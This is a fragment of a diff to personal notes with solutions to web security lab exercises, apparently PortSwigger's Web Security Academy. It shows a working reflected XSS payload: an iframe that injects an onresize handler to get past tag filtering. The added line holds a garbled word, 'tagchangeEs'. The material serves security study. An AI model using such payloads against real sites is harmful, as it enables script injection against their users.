B310M0R/notes/useful.md

 </script>
 ```
 8. Reflected XSS into HTML context with most tags and attributes blocked
-BruteForce all tags by using xss cheat-sheet, then:
+BruteForce all tagchangeEs by using xss cheat-sheet, then:
 ```
 <iframe src="https://0a61001b0306cecac0be0a5000570086.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
 ```